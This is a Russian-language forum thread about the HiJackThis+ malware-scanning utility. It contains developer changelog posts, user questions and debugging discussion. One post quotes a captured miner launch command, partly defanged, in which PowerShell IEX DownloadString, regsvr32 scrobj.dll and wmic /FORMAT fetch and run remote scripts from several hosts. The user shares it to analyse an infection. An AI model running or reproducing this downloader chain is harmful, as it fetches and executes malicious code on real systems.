HiJackThis+ (Plus)

HiJackThis+ (Plus) 3.4.0.17

Скачать
Обзор F.A.Q. Обновления (56) Отзывы (2) История Обсуждение

Переводчик Google
Если подсистему WMI не вырезали из системы, то осуществляет. HJT работает не через wmic.exe, а напрямую.
 
Спасибо за ответ.

Есть майнер, запуск которого ловит Защитник, но ни в одних логах нет связанных с ним привычных записей WMI. Маскироваться записи могут?
 
Могут. Пришлите семпл, потом можно будет о чем-то говорить. Через карантин дефендера ведь можно найти тушку и потом оттрейсить из UVs до источника.
 
Защитник ловит только запуск (во избежание детекта на форум заменил часть латиницы кириллицей)

CmdLine: C:\Windows\System32\cmd.exe /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8080/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185_26_113_95:8221/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8096/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8204/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi22.hа7455h6fi1.net:8080/рower.txt')||regsvr32 /u /s /i:h__p://hа7455h6fi1.net:8080/s22.tхt scrobj.dll&wmic os get /FORMAT:"h__p://wmi2.hа7455h6fi1.net:8220/s2.хsl
Нажмите для раскрытия...
 
Последнее редактирование:
Фильтр без Consumer бесполезен.
HJT не отображает "хвосты" от WMI. Уже несколько раз объяснял.
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.19] - 24.07.2022
- Обновлён белый список служб.
- Некоторые корректировки в O4, чтобы охватывать большее число случаев при отображении постфикса "(Microsoft)".
- O22 - Tasks_Migrated: добавлено определение мигрированных заданий.
- O22 - Tasks: добавлено определение заданий в SysWow64.
- O22 - Tasks: исправлено неверное декодирование не-англоязычных символов xml парсером.
Нажмите для раскрытия...

Узнать больше об этом обновлении...
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.20] - 02.08.2022
- Выполнено несколько исправлений AppLocker (спасибо regist за отчёты, аналитику и поддержку):
- O7 - AppLocker: добавлено определение правила "ManagedInstaller".
- O7 - AppLocker: исправлено hash правило, которое отображалось в виде одной записи, вместо нескольких.
- O7 - Applocker: улучшена процедура "Fix all".
Нажмите для раскрытия...

Узнать больше об этом обновлении...
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.21] - 28.08.2022
- Добавлены сведения о свободной физической памяти и общей нагрузке на центральный процессор*.
* На слабых процессорах данные о нагрузке могут быть завышены.
- Урезаны метаданные иконок, которые обнаруживались правилами Sigma.
- Исправлены шаблон Hosts и его ACL права до эталонных.
- O22 - добавлены префиксы -32 для 32-битных заданий в 64-битной ОС.
- Инструменты=>Разблокировать файл/папку: Улучшена рекурсивная процедура сброса прав.
Нажмите для раскрытия...

Узнать больше об этом обновлении...
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.23] - 03.09.2022
- Контекстное меню: добавлена кнопка "Копировать" - "Аргумент файла".
- Поиск: сохранение последней искомой фразы после закрытия программы.
- Сканер ADS: исправлена работа кнопки "Обзор" (спасибо Alexyz21 за извещение).
- Менеджер деинсталляции программ: исправлено расположение кнопки "Удаление программ".
- Инструмент проверки ЭЦП: Новые кнопки "Добавить папку" и "Очистить список".
- Поправлены переводы.
Нажмите для раскрытия...

Узнать больше об этом обновлении...
 
  • Like
Реакции: akok
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.25] - 14.01.2023
- Исправлено зависание при исправлении O7 - TroubleShooting: (EV).
- Обновлены белые списки Windows 11.
- Добавлено определение политик Windows Defender и восстановление провайдеров AMSI.
Нажмите для раскрытия...

Узнать больше об этом обновлении...
 
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновления

[2.10.0.29] - 14.04.2023
- Добавлен O7 - AutoLogon.
- O7 - TroubleShooting (EV): для [PathExt] и [PSModulePath] изменён метод проверки на "Missing list", т.е. элемент выводится только, если не хватает системной записи по умолчанию.
- Исправлено переполнение в классе таймера (спасибо Mikle Quits).
- Исправлен пункт "Найти в Google".
- Некоторые оптимизации скорости.

[2.10.0.28] - 02.03.2023
- Исправлен баг с прогресс-баром (спасибо @Yashil06 за извещение).

[2.10.0.26] - 13.02.2023
-...
Нажмите для раскрытия...

Узнать больше об этом обновлении...
 
forum.kasperskyclub.ru

Trojan:Win32/HijackSQLServer.AB and Trojan:XML/SuspBuild.MJ!ibt and ISB.Downloader!gen173

Доброго дня! Защитник (Trojan:Win32/HijackSQLServer.AB) на Win 2016 ликвидирует вот такие критические угрозы. (скриншот 1 и 2) За день таких попыток вредоносное ПО предпринимает несколько раз. Процесс запускается от пользователя MSSQLSERVER. В случае Win 2008 и с антивирусом Symantec (ISB.Downloa...
forum.kasperskyclub.ru forum.kasperskyclub.ru

Debug information:

Warning! The integrity of this HiJackThis instance is corrupted.
Perhaps the file has been patched or infected by a virus.
It is recommended to download the program again from official source: GitHub - dragokas/hijackthis: A free utility that finds malware, adware and other security threats
If this error repeats, check your PC using a boot disk or LiveCD, e.g.: Как записать образ Kaspersky Rescue Disk 18 or Dr.Web — Аптечка сисадмина. Бесплатные утилиты, утилита удаления Dr.Web
Нажмите для раскрытия...
 

Вложения

Последнее редактирование:
@thyrex,
Не прошел проверку по ЭЦП, как и ещё 2 файла службы.
Система старая, возможно не хватает некоторых корневых сертификатов.
Понятней будет только, если вручную зайти в свойства файла HiJackThis - вкладка "Цифровая подпись" - "Сведения", наверху будет объяснение причины.
На будущее наверное сделаю вывод описания ошибки проверки.
А заходя наперед, в планах добавить возможность устанавливать сертификаты из интерфейса хиджака.
А также делать доп. проверку корневого серта служб по своей базе, если в системе нужный серт отсутствует.
 
По поводу , логи - т.е , Symantec - всегда выдает ложное детект , поскольку она так всегда агрессивен к недоверию файла.
С, старым системой -проверить систему на XP , бесполезен - пустая трата на разработку. Т.е , система уже не в актуальном состоянии - а поддержка прекращен.
По моему личное мнение - недостаточная квалификация у самого пользователя , пусть администратор обновит свежую систему до актуальную состояние - где дырка исправлен в M$ , на новом билде.
 
Последнее редактирование модератором:
wumbo12, давайте обойдемся без Ваших "мудрых" советов
 
@wumbo12, я себя нормально чувствую более 5 лет на Windows 7. И уже как минимум 3 раза себя плохо чувствовал на Windows 10, 11, доводя систему до незагружаемого состояния за полгода. Так что нет, мне бы к примеру не хотелось обновлять до "актуального состояния".
По сути инструмент, который я делаю, будет единственным в своём роде, позволяющим добавить сертификаты и дать возможность запустится некоторым особо требовательным к проверкам инсталляторам.
HiJackThis поддерживает не только XP, но и Windows 2000. А политика Microsoft пусть идёт лесом. Им лишь бы бабла срубить и всех на Win 11 пересадить.
 
Dragokas написал(а):
@wumbo12, я себя нормально чувствую более 5 лет на Windows 7. И уже как минимум 3 раза себя плохо чувствовал на Windows 10, 11, доводя систему до незагружаемого состояния за полгода. Так что нет, мне бы к примеру не хотелось обновлять до "актуального состояния".
По сути инструмент, который я делаю, будет единственным в своём роде, позволяющим добавить сертификаты и дать возможность запустится некоторым особо требовательным к проверкам инсталляторам.
HiJackThis поддерживает не только XP, но и Windows 2000. А политика Microsoft пусть идёт лесом. Им лишь бы бабла срубить и всех на Win 11 пересадить.
Нажмите для раскрытия...
Поддерживаю , виноват конечно же Microsoft , ведь Microsoft -делает только "Фигушки" за жадность, нет свободное , как говорится Open Source , GPL 3.0 вроде как .
 
Войдите или зарегистрируйтесь для ответа.

Похожие темы

F
  • Закрыта
Закрыто [HiJackThis+] Нужно ли что-то фиксить?
Ответы
2
Просмотры
225
Sandor
Sandor
Hunter
Оффтоп из темы по HiJackThis
2
Ответы
24
Просмотры
2K
Dragokas
Dragokas
Sandor
  • Закрыта
Как деинсталлировать скрытую программу через HiJackThis
Ответы
0
Просмотры
3K
Sandor
Sandor
Назад
Сверху Снизу